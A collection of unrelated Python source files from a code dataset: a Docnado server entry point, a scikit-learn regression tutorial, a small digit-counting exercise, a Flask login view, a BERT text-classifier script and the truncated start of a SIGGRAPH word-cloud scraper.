parser.add_argument('--port', action="store", dest='new_port_number',
default=False,
help='Specify a port for the docnado server')
parser.add_argument('--host', action="store", dest='set_host',
default=False,
help='Set the docnado development server to listen on IP addresses.')
# Import the command line args and make them application global.
global CMD_ARGS
args = parser.parse_args()
CMD_ARGS = args
# Load config from the environment and validate it.
global PROJECT_LOGO, PDF_GENERATION_ENABLED, NAV_MENU, WKHTMLTOPDF_BINARY
TRUE = 'TRUE'
FALSE = 'FALSE'
flask_debug = os.environ.get('DN_FLASK_DEBUG', FALSE) == TRUE
watch_changes = os.environ.get('DN_RELOAD_ON_CHANGES', TRUE) == TRUE
WKHTMLTOPDF_BINARY = ('wkhtmltopdf_0.12.5.exe' if platform.system() == 'Windows' else 'wkhtmltopdf')
PDF_GENERATION_ENABLED = check_pdf_generation_cap()
dir_documents = os.environ.get('DN_DOCS_DIR', os.path.join(os.getcwd(), 'docs'))
dir_style = os.environ.get('DN_STYLE_DIR', os.path.join(os.getcwd(), 'style'))
logo_location = os.environ.get('DN_PROJECT_LOGO', os.path.join(os.getcwd(), 'logo.png'))
# If `style` folder does not exist, use the one in site-packages.
if not os.path.exists(dir_style) and not os.path.isdir(dir_style):
dir_style = os.path.join(os.path.dirname(__file__), 'style')
# Attempt to load the project logo into a base64 data uri.
PROJECT_LOGO = load_project_logo(logo_location)
# Compute the static and template directories.
dir_static = os.path.join(dir_style, 'static')
dir_templates = os.path.join(dir_style, 'templates')
# If the user is asking to create a new project.
if args.new_project:
copy_local_project()
sys.exit()
if args.new_project_force:
copy_local_project(force=True)
return 0
if args.new_port_number:
PORT_NUMBER = int(args.new_port_number)
if args.generate_meta:
doc_files = glob.iglob(args.generate_meta + '/**/*.md', recursive=True)
for i in doc_files:
generate_metadata(i)
return 0
if args.find_orphans:
# Find all the assets in the directory/subdirectories recursively and append their file path to a list.
files = glob.glob((dir_documents + '/**/*.*'), recursive=True)
files = [f for f in files if not os.path.isdir(f)]
orphans = find_orphans(files)
if orphans:
print(f'{len(orphans)} Unused assets (orphans):\n\t' + '\n\t'.join(orphans))
return -1
return 0
if args.find_broken_links:
process_pool = Pool(processes=10)
md_files = glob.glob((dir_documents + '/**/*.md'), recursive=True)
md_reports = tuple((md, list(DocumentLinks(md).detect_broken_links(process_pool))) for md in md_files)
num_broken = 0
for file, report in md_reports:
if report:
num_broken += len(report)
print(f'{file}\n\t' + '\n\t'.join(report))
return -1 if num_broken else 0
if args.show_dirs:
print('The following directories are being used: ')
print('\t', f'Documents -> {dir_documents}')
print('\t', f'Logo -> {logo_location}')
print('\t', f'Style -> {dir_style}')
print('\t', f' Static -> {dir_static}')
print('\t', f' Templates -> {dir_templates}')
sys.exit()
if not os.path.exists(dir_documents) and not os.path.isdir(dir_documents):
print(f'Error: Documents directory "{dir_documents}" does not exist. \
Create one called `docs` and fill it with your documentation.', file=sys.stderr)
sys.exit(-1)
if not os.path.exists(dir_static) and not os.path.isdir(dir_static):
print(f'Error: Static directory "{dir_static}" does not exist.', file=sys.stderr)
sys.exit(-1)
if not os.path.exists(dir_templates) and not os.path.isdir(dir_templates):
print(f'Error: Templates directory "{dir_templates}" does not exist.', file=sys.stderr)
sys.exit(-1)
# Create the server.
app = Flask(__name__,
static_url_path='',
template_folder=dir_templates,
static_folder=dir_static)
# Attach routes and filters.
configure_flask(app, dir_documents)
# Output PDF files.
if args.pdf_output_dir:
if not check_pdf_generation_cap():
print(f'Error: PDF generation requires WkHTMLtoPDF.', file=sys.stderr)
sys.exit(-1)
def gen_pdfs():
time.sleep(2)
generate_static_pdf(
app, dir_documents, os.path.join(os.getcwd(), args.pdf_output_dir)
)
time.sleep(5)
os.kill(os.getpid(), signal.SIGTERM)
t1 = threading.Thread(target=gen_pdfs)
t1.start()
app.run(debug=flask_debug, threaded=True, port=PORT_NUMBER)
sys.exit()
# Output a static site.
if args.html_output_dir:
PDF_GENERATION_ENABLED = False
try:
generate_static_html(app, dir_documents, os.path.join(os.getcwd(), args.html_output_dir))
index_html = """ <!DOCTYPE html>
<html>
<head>
<meta http-equiv="refresh" content="0; url=./w/">
</head>
<body>
</body>
</html>"""
with open(os.path.join(os.getcwd(), args.html_output_dir, 'index.html'), 'w') as f:
f.write(index_html)
except Exception:
traceback.print_exc(file=sys.stderr)
sys.exit(-1)
sys.exit()
# Watch for any changes in the docs or style directories.
dn_watch_files = []
observer = None
if watch_changes:
observer = Observer()
observer.schedule(ReloadHandler(app), path=dir_documents, recursive=True)
observer.start()
dn_watch_files = build_reload_files_list([__name__, dir_style])
# Run the server.
if args.set_host:
try:
print('Attempting set sevelopment server listen on public IP address: ' + args.set_host)
print('WARNING: The Docnado development environment is intended to be used as a development tool ONLY, '
'and is not recommended for use in a production environment.')
app.run(debug=flask_debug, port=PORT_NUMBER, extra_files=dn_watch_files, host=args.set_host)
except OSError as e:
print(e)
print(f'Error initialising server.')
except KeyboardInterrupt:
pass
finally:
if observer:
observer.stop()
observer.join()
else:
try:
app.run(debug=flask_debug, port=PORT_NUMBER, extra_files=dn_watch_files)
except OSError as e:
print(e)
print(f'Error initialising server.')
except KeyboardInterrupt:
pass
finally:
if observer:
observer.stop()
observer.join()
# if running brainerd directly, boot the app
if __name__ == "__main__":
main()
| StarcoderdataPython |
85070 | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 16 09:57:44 2017
@author: hao
"""
import numpy as np
import matplotlib.pyplot as plt
# In[]
# 4.1.1 The Normal Equation
X = 2 * np.random.rand(100, 1) # generate a 100*1 array
y = 4 + 3 * X + np.random.randn(100, 1)
X_b = np.c_[np.ones((100, 1)), X] # add x0 = 1 to each instance
theta_best = np.linalg.inv(X_b.T.dot(X_b)).dot(X_b.T).dot(y)
theta_best
# In[]
X_new = np.array([[0], [2]])
X_new_b = np.c_[np.ones((2, 1)), X_new] # add x0 = 1 to each instance
y_predict = X_new_b.dot(theta_best)
plt.plot(X_new, y_predict, "r-")
plt.plot(X, y, "b.")
plt.axis([0, 2, 0, 15])
plt.show()
# In[] The equivalent code using Scikit-Learn
from sklearn.linear_model import LinearRegression
lin_reg = LinearRegression()
lin_reg.fit(X, y)
lin_reg.intercept_, lin_reg.coef_
lin_reg.predict(X_new)
# In[]
# 4.2.1 Batch Gradient Descent
eta = 0.1 # learning rate
n_iterations = 1000x`
m = 100
theta = np.random.randn(2,1) # random initialization
for iteration in range(n_iterations):
gradients = 2/m * X_b.T.dot(X_b.dot(theta) - y)
theta = theta - eta * gradients
theta
# In[]
# 4.2.2 Stochastic Gradient Descent
n_epochs = 50
t0, t1 = 5, 50 # learning schedule hyperparameters
def learning_schedule(t):
return t0 / (t + t1)
theta = np.random.randn(2,1) # random initialization
for epoch in range(n_epochs):
for i in range(m):
random_index = np.random.randint(m)
xi = X_b[random_index:random_index+1]
yi = y[random_index:random_index+1]
gradients = 2 * xi.T.dot(xi.dot(theta) - yi)
eta = learning_schedule(epoch * m + i)
theta = theta - eta * gradients
theta
# In[]
# perform Linear Regression using SGD with Scikit-Learn
from sklearn.linear_model import SGDRegressor
sgd_reg = SGDRegressor(n_iter=50, penalty=None, eta0=0.1)
sgd_reg.fit(X, y.ravel())
sgd_reg.intercept_, sgd_reg.coef_
# In[]
# 4.2.3 Mini-batch Gradient Descent
m = 100
X = 6 * np.random.rand(m, 1) - 3
y = 0.5 * X**2 + X + 2 + np.random.randn(m, 1)
plt.plot(X, y, "b.")
from sklearn.preprocessing import PolynomialFeatures
poly_features = PolynomialFeatures(degree=2, include_bias=False)
X_poly = poly_features.fit_transform(X)
lin_reg = LinearRegression()
lin_reg.fit(X_poly, y)
lin_reg.intercept_, lin_reg.coef_
X_test = np.arange(-3,4, 0.5)
y_predict = lin_reg.coef_[0,1]*X_test**2 + lin_reg.coef_[0,0]*X_test + lin_reg.intercept_[0]
plt.plot(X_test, y_predict, "r-")
plt.axis([-3, 3, 0, 10])
plt.show()
# In[]
# 4.3.1 Learning Curves
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import train_test_split
def plot_learning_curves(model, X, y):
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.2)
train_errors, val_errors = [], []
for m in range(1, len(X_train)):
model.fit(X_train[:m], y_train[:m])
y_train_predict = model.predict(X_train[:m])
y_val_predict = model.predict(X_val)
train_errors.append(mean_squared_error(y_train_predict, y_train[:m]))
val_errors.append(mean_squared_error(y_val_predict, y_val))
plt.plot(np.sqrt(train_errors), "r-+", linewidth=2, label="train")
plt.plot(np.sqrt(val_errors), "b-", linewidth=3, label="val")
# In[]
from sklearn.pipeline import Pipeline
polynomial_regression = Pipeline((
("poly_features", PolynomialFeatures(degree=10, include_bias=False)),
("sgd_reg", LinearRegression()),
))
plot_learning_curves(polynomial_regression, X, y)
# In[]
# 4.4.1 Ridge Regression
from sklearn.linear_model import Ridge
ridge_reg = Ridge(alpha=1, solver="cholesky")
ridge_reg.fit(X, y)
ridge_reg.predict([[1.5]])
sgd_reg = SGDRegressor(penalty="l2")
sgd_reg.fit(X, y.ravel())
sgd_reg.predict([[1.5]])
# In[]
# 4.4.2 Lasso Regression
from sklearn.linear_model import Lasso
lasso_reg = Lasso(alpha=0.1)
lasso_reg.fit(X, y)
lasso_reg.predict([[1.5]])
# In[]
# 4.4.3 Elastic Net
from sklearn.linear_model import ElasticNet
elastic_net = ElasticNet(alpha=0.1, l1_ratio=0.5)
elastic_net.fit(X, y)
elastic_net.predict([[1.5]])
# In[]
# 4.5.3 Decision Boundaries
from sklearn import datasets
iris = datasets.load_iris()
list(iris.keys())
X = iris["data"][:, 3:] # petal width
y = (iris["target"] == 2).astype(np.int) # 1 if Iris-Virginica, else 0
# In[]
from sklearn.linear_model import LogisticRegression
log_reg = LogisticRegression()
log_reg.fit(X, y)
# In[]
X_new = np.linspace(0, 3, 1000).reshape(-1, 1)
y_proba = log_reg.predict_proba(X_new)
plt.plot(X_new, y_proba[:, 1], "g-", label="Iris-Virginica")
plt.plot(X_new, y_proba[:, 0], "b--", label="Not Iris-Virginica")
# In[]
# 4.5.4 Softmax Regression
X = iris["data"][:, (2, 3)] # petal length, petal width
y = iris["target"]
softmax_reg = LogisticRegression(multi_class="multinomial",solver="lbfgs", C=10)
softmax_reg.fit(X, y)
softmax_reg.predict([[5, 2]])
softmax_reg.predict_proba([[5, 2]]) | StarcoderdataPython |
1633461 | #!/bin/python3
import sys
def to_arr(num):
arr = []
while num != 0:
arr.append(num % 10)
num = int(num / 10)
arr.reverse()
return arr
t = int(input().strip())
for a0 in range(t):
n = int(input().strip())
arr = to_arr(n)
num_div = 0
for i in range(0, len(arr)):
if (arr[i] != 0) and (n % arr[i] == 0):
num_div += 1
print(num_div)
| StarcoderdataPython |
3249601 | <filename>server/src/weblab/core/webclient/web/view_index.py
import traceback
from flask import render_template, request, flash, redirect, url_for, make_response
from weblab.core.login.exc import InvalidCredentialsError
from weblab.core.webclient.web.helpers import safe_redirect
from weblab.core.wl import weblab_api
from weblab.core.exc import SessionNotFoundError
@weblab_api.route_webclient("/", methods=["GET", "POST"])
def index():
"""
Handles the index screen displaying (GET) and login (POST).
"""
# THIS POST WILL ONLY BE INVOKED IF JAVASCRIPT IS DISABLED.
# Otherwise logging is handled from JS.
if request.method == "POST":
return handle_login_POST()
return handle_login_GET()
def handle_login_POST():
"""
Carries out an actual log in.
:return:
"""
# If this is a POST it is a login request.
#
username = request.values.get("username")
password = request.values.get("password")
guestlogin = request.values.get("guestlogin")
# If we have a guestlogin then it is a DEMO login request.
if guestlogin is not None:
username = "demo"
password = "<PASSWORD>"
# We may or may not have a 'next' field. If we do, we make sure that the URL is safe.
next = request.values.get("next")
next = safe_redirect(next)
try:
session_id = weblab_api.api.login(username, password)
except InvalidCredentialsError:
flash("Invalid username or password", category="error")
# _scheme is a workaround. See comment in other redirect.
return redirect(url_for(".index", _external=True, _scheme=request.scheme))
except:
traceback.print_exc()
flash("There was an unexpected error while logging in.", 500)
return make_response("There was an unexpected error while logging in.", 500)
else:
# TODO: Find proper way to do this.
# This currently redirects to HTTP even if being called from HTTPS. Tried _external as a workaround but didn't work.
# More info: https://github.com/mitsuhiko/flask/issues/773
# For now we force the scheme from the request.
response = make_response(redirect(next or url_for(".labs", _external=True, _scheme=request.scheme)))
""" @type: flask.Response """
session_id_cookie = '%s.%s' % (session_id.id, weblab_api.ctx.route)
# Inserts the weblabsessionid and loginsessionid cookies into the response.
# (What is the purpose of having both? Why the different expire dates?)
weblab_api.fill_session_cookie(response, session_id_cookie)
print "LOGGED IN WITH: (%s)" % (session_id_cookie)
return response
def handle_login_GET():
"""
Displays the index (the login page).
"""
return render_template("webclient_web/index.html")
@weblab_api.route_webclient("/logout", methods=["GET", "POST"])
def logout():
"""
Logout will logout the current session and redirect to the main page.
"""
try:
# TODO: Take into account the somewhat unclear difference between the loginweblabsessionid and the other one.
cookie = request.cookies.get("weblabsessionid", None)
if cookie is not None:
# Prepare to call the weblab_api
weblab_api.ctx.reservation_id = cookie
weblab_api.api.logout()
except SessionNotFoundError as ex:
# We weren't logged in but it doesn't matter because we want to logout anyway.
pass
return redirect(url_for(".index", _external=True, _scheme=request.scheme))
| StarcoderdataPython |
3214169 | # SETUP
#
# Refs
# https://github.com/UKPLab/sentence-transformers
# https://towardsdatascience.com/nlp-extract-contextualized-word-embeddings-from-bert-keras-tf-67ef29f60a7b
# https://towardsdatascience.com/bert-for-dummies-step-by-step-tutorial-fb90890ffe03
# Standard includes
import csv
import pickle
import pandas as pd
import string
from tkinter import Tk, filedialog
# import nltk
# nltk.download('stopwords')
# nltk.download('wordnet')
from nltk.corpus import stopwords
from nltk.stem.wordnet import WordNetLemmatizer
from pandas import DataFrame
from sklearn import svm
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.svm import SVC
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.ensemble import VotingClassifier
from sklearn.model_selection import GridSearchCV
import numpy as np
from sklearn.metrics import average_precision_score
from sklearn.metrics import plot_precision_recall_curve
import matplotlib.pyplot as plt
import seaborn as sn
from sentence_transformers import SentenceTransformer
from sklearn.metrics import precision_recall_fscore_support, classification_report
# Select File
root = Tk()
root.filename = filedialog.askopenfilename()
file = root.filename
root.withdraw()
# (NLTK) Helper Settings
stop = set(stopwords.words('english'))
exclude = set(string.punctuation)
lemma = WordNetLemmatizer()
# (NLTK) Helper Functions
def clean(doc):
stop_free = " ".join([i for i in doc.split() if i not in stop])
punc_free = ''.join(ch for ch in stop_free if ch not in exclude)
normalized = " ".join(lemma.lemmatize(word) for word in punc_free.split())
return normalized
# Settings & Variables
# TODO: Populate key_dict dynamically based on what the Label is...
#key_dict = {0: 'Social Relationships', 1: 'Health, Fatigue, or Physical Pain', 2: 'Emotional Turmoil', 3: 'Work',
# 4: 'Family Issues', 5: 'Everday Decision Making', 6: 'School', 7: 'Other', 8: 'Financial Problem'}
#key_dict = {1: '1', 2: '2', 3: '3', 4: '4', 5: '5', 6: '6', 7: '7', 8: '8', 9: '9', 10: '10'}
Input_File = file
print(Input_File)
output_model_filename = 'finalized_model.sav'
output_probs = "output_probs.csv"
Label = "Multi-class"
Features = "BERT"
Algorithm = "SVC"
Sweep = False
# ----------------------------------------
# SCRIPT PROCESSING
# This is where the main processing takes place
# Read data from converted/compiled CSV (Assumes data is sorted by 'Set' column ascending)
# TODO: See how the TF_IDF features parse the list and use that here instead of relying on the ordering of 'Set'
df = pd.read_csv(Input_File)
TargetNamesStrings = [str(x) for x in df[Label].unique().tolist()]
TargetNames = df[Label].unique().tolist()
TargetNames.sort()
dataset = (df['Set'] == 0).sum()
class_report = open('scikit_report.txt', 'w')
class_report.write(str(Input_File) + '\n')
# Preview the first 5 lines of the loaded data
print(df.head())
class_report.write(str(df.head()))
class_report.write('\n')
# Cast labels
df[Label] = df[Label].astype(int)
# Read each document and clean it.
df["Sentence"] = df["Sentence"].apply(clean)
# Let's do some quick counts
# TODO: Make this dynamic so we don't have to interact with the code here to change # of labels above
CategoryLabels = list(df[Label])
label_sum = float(len(CategoryLabels))
print(" ")
class_report.write(" \n")
print("===============")
class_report.write("===============\n")
print("Data Distribution:")
class_report.write("Data Distribution:\n")
for label in TargetNames:
print(str(label) + ' ' + str(key_dict[label]) + ' contains:', CategoryLabels.count(label), round(float(CategoryLabels.count(label) / label_sum), 2))
class_report.write(str(label) + ' ' + str(key_dict[label]) + ' contains:' + ' ' + str(CategoryLabels.count(label)) + ' ' + str(round(float(CategoryLabels.count(label) / label_sum), 2)))
class_report.write('\n')
# Beginning to calculate features include BERT and TF-IDF; this process can be a bit of bottleneck
# TODO: Consider writing these variables to a file to "pre-compute" them if experiments are taking awhile
print(" ")
class_report.write(" \n")
print("===============")
class_report.write("===============\n")
print("Fitting Features: ")
class_report.write("Fitting Features: \n")
print(" ")
class_report.write('\n')
bert_dimension = 0
if Features == "All" or Features == "BERT":
# Create BERT Features and add to data frame
print('Fitting BERT Features')
class_report.write('Fitting BERT Features')
model = SentenceTransformer('bert-base-nli-mean-tokens')
sentences = df['Sentence'].tolist()
sentence_embeddings = model.encode(sentences)
encoded_values = pd.DataFrame(np.row_stack(sentence_embeddings))
FeatureNames = []
bert_dimension = encoded_values.shape[1]
for x in range(0, bert_dimension):
FeatureNames.append("BERT_" + str(x))
training_corpus = encoded_values.head(dataset)
test_corpus = encoded_values.tail((df['Set'] == 1).sum())
tf_dimension = 0
if Features == "All" or Features == "TF":
# Create TF-IDF Features and add to data frame
print('Fitting TF-IDF Features')
tf_train, tf_test = df[df['Set'] != 1], df[df['Set'] == 1]
tf_training_corpus = tf_train['Sentence'].values
tf_training_labels = tf_train[Label].values
tf_test_corpus = tf_test['Sentence'].values
tf_test_labels = tf_test[Label].values
tf_idf_vectorizer = TfidfVectorizer(max_df=0.95, min_df=2, max_features=5000, stop_words='english')
tfidf = tf_idf_vectorizer.fit_transform(tf_training_corpus)
X = tf_idf_vectorizer.fit_transform(tf_training_corpus).todense()
featurized_training_data = []
for x in range(0, len(X)):
tfid_Features = np.array(X[x][0]).reshape(-1, )
featurized_training_data.append(tfid_Features)
FeatureNames = []
tf_dimension = X.shape[1]
for x in range(0, tf_dimension):
FeatureNames.append("TFIDF_" + str(x))
X = tf_idf_vectorizer.transform(tf_test_corpus).todense()
featurized_test_data = []
for x in range(0, len(X)):
tfid_Features = np.array(X[x][0]).reshape(-1, )
featurized_test_data.append(tfid_Features)
# Merge the feature data if 'All' or get the TF-IDF Features if 'TF'
if Features == 'All':
featurized_training_data_df = DataFrame(featurized_training_data, columns=FeatureNames)
training_corpus = pd.concat([training_corpus, featurized_training_data_df], axis=1)
test_corpus = test_corpus.reset_index()
test_corpus = test_corpus.drop(['index'], axis=1)
featurized_test_data_df = DataFrame(featurized_test_data, columns=FeatureNames)
test_corpus = pd.concat([test_corpus, featurized_test_data_df], axis=1)
elif Features == 'TF':
featurized_training_data_df = DataFrame(featurized_training_data, columns=FeatureNames)
training_corpus = featurized_training_data_df
featurized_test_data_df = DataFrame(featurized_test_data, columns=FeatureNames)
test_corpus = featurized_test_data_df
# Get the labels from the original data frame
temp1 = df.head(dataset)
temp2 = df.tail((df['Set'] == 1).sum())
training_labels = temp1[Label].values
test_labels = temp2[Label].values
training_labels = training_labels.astype(int)
test_labels = test_labels.astype(int)
# Create final dataset for Testing & Training by joining Labels
train = pd.DataFrame(training_corpus)
test = pd.DataFrame(test_corpus)
mapping = dict(zip(np.unique(training_labels), np.arange(len(TargetNames))))
mapping_2 = dict(zip(np.unique(test_labels), np.arange(len(TargetNames))))
train[Label] = pd.Categorical.from_codes(pd.Series(training_labels).map(mapping), TargetNames)
test[Label] = pd.Categorical.from_codes(pd.Series(test_labels).map(mapping_2), TargetNames)
# Show the number of observations for the test and training data frames
print(" ")
class_report.write('\n')
print("===============")
class_report.write("===============\n")
print("Fold Information: ")
class_report.write("Fold Information: \n")
print('Number of observations in the training data:', len(train))
class_report.write('Number of observations in the training data: ' + str(len(train)) + '\n')
print('Number of observations in the test data:', len(test))
class_report.write('Number of observations in the test data: ' + str(len(test)) + '\n')
print('Number of features generated:', str(tf_dimension + bert_dimension))
class_report.write('Number of features generated: ' + str(tf_dimension + bert_dimension) + '\n')
# Create a list of the feature column's names
features = train.columns[:(tf_dimension + bert_dimension)]
# Create a classifier. By convention, clf means 'classifier'
if Algorithm == "SVC":
clf = SVC(kernel='rbf', class_weight='balanced', probability=True)
if Algorithm == "SVC-Sweep":
clf = SVC(kernel='poly', class_weight='balanced', C=1, decision_function_shape='ovo', gamma=0.0001,
probability=True)
if Algorithm == "LSVC":
clf = svm.LinearSVC()
if Algorithm == "RF":
clf = RandomForestClassifier(n_jobs=-1, class_weight="balanced")
if Algorithm == "GBT":
clf = GradientBoostingClassifier(n_estimators=100, learning_rate=1.0, max_depth=1, random_state=0)
if Algorithm == "VT":
clf1 = SVC(kernel='rbf', class_weight="balanced", probability=True)
clf2 = RandomForestClassifier(n_jobs=-1, class_weight="balanced")
clf3 = GradientBoostingClassifier(n_estimators=100, learning_rate=1.0, max_depth=1, random_state=0)
clf = VotingClassifier(estimators=[('svc', clf1), ('rf', clf2), ('gbt', clf3)], voting='soft', weights=[1, 1, 1])
# Train the classifier to take the training features and learn how they relate
clf.fit(train[features], train[Label])
# Apply the classifier we trained to the test data (which, remember, it has never seen before)
preds = clf.predict(test[features])
if Algorithm == "SVC" or Algorithm == "SVC-Sweep":
# Output the probabilities for the SVC, it's possible this could be extended to other alogirthms
# TODO: Investigate
# Below this is some legacy code which will allow you to filter the output and see it reflected
# in the stats below by swapping in y_pred but this can have a whacky interaction with other classifiers
preds_proba = clf.predict_proba(test[features])
y_pred = (clf.predict_proba(test[features])[:, 1] >= 0.695).astype(bool)
# View the PREDICTED classes for the first five observations
print(" ")
class_report.write('\n')
print("===============")
class_report.write("===============\n")
print("Example Prediction: ")
class_report.write("Example Prediction: \n")
print(preds[0:5])
class_report.write(str(preds[0:5]))
if Algorithm == "SVC" or Algorithm == "SVC-Sweep":
with open(output_probs, 'w', newline='') as my_csv:
csvWriter = csv.writer(my_csv, delimiter=',')
csvWriter.writerows(preds_proba)
# View the ACTUAL classes for the first five observations
print(" ")
class_report.write('\n')
print("===============")
class_report.write("===============\n")
print("Actual: ")
class_report.write("Actual: \n")
print(str(test[Label].head()))
class_report.write(str(test[Label].head()) + '\n')
# Create confusion matrix
print(" ")
class_report.write('\n')
print("===============")
class_report.write("===============\n")
print("Confusion Matrix: ")
class_report.write("Confusion Matrix: \n")
print(" ")
class_report.write('\n')
confusion_matrix = pd.crosstab(test[Label], preds, rownames=['Actual Categories'], colnames=['Predicted Categories'])
print(str(pd.crosstab(test[Label], preds, rownames=['Actual Categories'], colnames=['Predicted Categories'])))
class_report.write(str(pd.crosstab(test[Label], preds, rownames=['Actual Categories'], colnames=['Predicted Categories'])))
# Show confusion matrix in a separate window
sn.set(font_scale=1.4) # for label size
g = sn.heatmap(confusion_matrix, annot=True, annot_kws={"size": 12}, cmap="YlGnBu", cbar=False) # font size
bottom, top = g.get_ylim()
g.set_ylim(bottom + 0.5, top - 0.5)
plt.show()
# Precion, Recall, F1
print(" ")
print("===============")
print("Classification Report: ")
print(" ")
class_report.write('\n')
class_report.write("===========\n")
class_report.write("Classification Report: \n")
class_report.write(" \n")
print("Precision, Recall, Fbeta Stats: ")
print('Macro: ', precision_recall_fscore_support(test[Label], preds, average='macro'))
print('Micro: ', precision_recall_fscore_support(test[Label], preds, average='micro'))
print('Weighted', precision_recall_fscore_support(test[Label], preds, average='weighted'))
print(" ")
class_report.write("Precision, Recall, Fbeta Stats: \n")
class_report.write('Macro: ' + str(precision_recall_fscore_support(test[Label], preds, average='macro')) + '\n')
class_report.write('Micro: ' + str(precision_recall_fscore_support(test[Label], preds, average='micro')) + '\n')
class_report.write('Weighted' + str(precision_recall_fscore_support(test[Label], preds, average='weighted')) + '\n')
class_report.write(" \n")
target_names_int = [int(name) for name in TargetNamesStrings]
target_names_int.sort()
TargetNamesStrings = [str(key_dict[x]) + '-' + str(x) for x in target_names_int]
print(classification_report(test[Label], preds, target_names=TargetNamesStrings))
class_report.write(str(classification_report(test[Label], preds, target_names=TargetNamesStrings)))
# Generate PR Curve (if doing a binary classification)
if (Algorithm == "SVC" or Algorithm == "SVC-Sweep") and (Label != "Multi-class" and Label != "Original-Multi-Class"):
y_score = clf.decision_function(test[features])
average_precision = average_precision_score(test[Label], y_score)
print('Average precision-recall score: {0:0.2f}'.format(average_precision))
class_report.write('Average precision-recall score: {0:0.2f}'.format(average_precision) + '\n')
disp = plot_precision_recall_curve(clf, test[features], test[Label])
# TODO: Bug below
disp.ax_.set_title('2-class Precision-Recall curve: ', 'AP={0:0.2f}'.format(average_precision))
plt.show()
# save the model to disk
pickle.dump(clf, open(output_model_filename, 'wb'))
# parameter sweep
if Sweep and Algorithm == "SVC":
param_grid = [
{'C': [1, 10, 100, 1000], 'kernel': ['linear'], 'decision_function_shape': ['ovo', 'ovr']},
{'C': [1, 10, 100, 1000], 'gamma': ['scale', 'auto', 0.001, 0.0001], 'kernel': ['rbf'],
'decision_function_shape': ['ovo', 'ovr']},
{'C': [1, 10, 100, 1000], 'gamma': ['scale', 'auto', 0.001, 0.0001], 'kernel': ['poly'],
'decision_function_shape': ['ovo', 'ovr']},
{'C': [1, 10, 100, 1000], 'gamma': ['scale', 'auto', 0.001, 0.0001], 'kernel': ['sigmoid'],
'decision_function_shape': ['ovo', 'ovr']}
]
print("")
class_report.write('\n')
print("Starting GridSearch; this could take some time...")
search = GridSearchCV(clf, param_grid, cv=5, n_jobs=-1).fit(train[features], train[Label])
print(search.best_params_)
print(search.best_score_)
print(search.best_estimator_)
class_report.write(str(search.best_params_))
class_report.write(str(search.best_score_))
class_report.write(str(search.best_estimator_))
class_report.close()
exit()
| StarcoderdataPython |
3253171 | <gh_stars>0
# import urllib.request
import re
import os
import collections
import math
import sys
# import lxml
# from lxml import html
import requests
import time
from datetime import datetime
HTML_PREFIX = """\
<html>
<head>
<title>SIGGRAPH Word Clouds</title>
<meta name="author" content="<NAME>">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">
<link href="https://fonts.googleapis.com/css?family=Source+Sans+Pro" rel="stylesheet">
<link href="static/main.css" rel="stylesheet" type="text/css">
</head>
<body>
"""
HTML_POSTFIX = """\
<!-- Start of StatCounter Code for Default Guide -->
<script type="text/javascript">
var sc_project=10471620;
var sc_invisible=1;
var sc_security="81ba45aa";
var scJsHost = (("https:" == document.location.protocol) ?
"https://secure." : "http://www.");
document.write("<sc"+"ript type='text/javascript' src='" +
scJsHost+
"statcounter.com/counter/counter.js'></"+"script>");
</script>
<noscript><div class="statcounter"><a title="shopify traffic
stats" href="http://statcounter.com/shopify/"
target="_blank"><img class="statcounter"
src="http://c.statcounter.com/10471620/0/81ba45aa/1/"
alt="shopify traffic stats"></a></div></noscript>
<!-- End of StatCounter Code for Default Guide -->
</body>
</html>
"""
# lower case only
CommonWords = ['and', 'or', 'for', 'of', 'by', 'is',
'a', 'with', 'using', 'in', 'from', 'the',
'3d', 'on', 'via', 'to', 'an', 'graphics', 'design', ]
def RemoveHTMLComments(str):
return re.sub('<!--.*?-->', '', str, flags=re.DOTALL)
# fetch a list of paper titles from ke-sen's page
def GetPaperTitles(str, confname):
if confname == "CVPR":
return re.findall('<dt class=\"ptitle\"><br><a href=\"[^\"]+\">[^<]+</a></dt>', str, flags=re.IGNORECASE)
else:
return re.findall('<dt><B>[^<]+</B>', str, flags=re.IGNORECASE)
# fetch words from paper titles, convert to lower case, remove special characters
def GetPaperTitleWords(titles):
return (re.sub('(<[^<]+?>)|:|\(|\)|,|!|\+', '', (" ").join(titles))).lower().split(' ')
def RemoveCommonWords(words):
return [w for w in words if w not in CommonWords]
def GetTopWords(words, N):
counter=collections.Counter(words)
return counter.most_common(N)
def isqrt(x):
fsqrt = math.sqrt(float(x))
return int(fsqrt)
# ---------- #
# -- main -- #
# ---------- #
def findTop5Words(prefix, postfix, title, Years, outFilename):
allWords = []
outFile = open(outFilename, 'w')
outFile.write(HTML_PREFIX)
outFile.write("<table class=\"ex\"><tr><td>")
outFile.write("<br><p class=\"page_title\">%s Paper Title Word Clouds</p>\n" % title)
outFile.write("<p>A very poor attempt to identify trends in graphics/ML research.</p>\n")
outFile.write("<strong>Notes</strong><ul>\n")
if prefix == "CVPR":
outFile.write("<li>Using data from <a href=\"http://openaccess.thecvf.com\">CVPR Open Access Page</a>. For source of this script, <a href=\"https://github.com/ap1/siggraph-wordcloud\">click here</a>.</li>\n")
else:
outFile.write("<li>Using data from <a href=\"http://kesen.realtimerendering.com\"><NAME>'s page</a>. For source of this script, <a href=\"https://github.com/ap1/siggraph-wordcloud\">click here</a>.</li>\n")
outFile.write("<li>Words ignored: %s</li>\n" % ((", ").join(sorted(CommonWords))))
outFile.write("<li>If you use this tool, please respect the host's bandwidth limits and only run it a few times, offline.</li>\n")
outFile.write("<li>Feedback: anjul dot patney at gmail dot com</li>\n")
outFile.write("</ul>\n")
rawWords = "<ul>"
for Year in Years:
# try:
if prefix == "CVPR":
fetchURL = "http://openaccess.thecvf.com/%s%s%s" % (prefix, Year, postfix)
else:
fetchURL = "http://kesen.realtimerendering.com/%s%s%s" % (prefix, Year, postfix)
print (fetchURL)
try:
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0',
}
# req = urllib.request.Request(fetchURL, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'})
time.sleep(0.5)
with requests.get(fetchURL, headers=headers) as page:
#print (response.content)
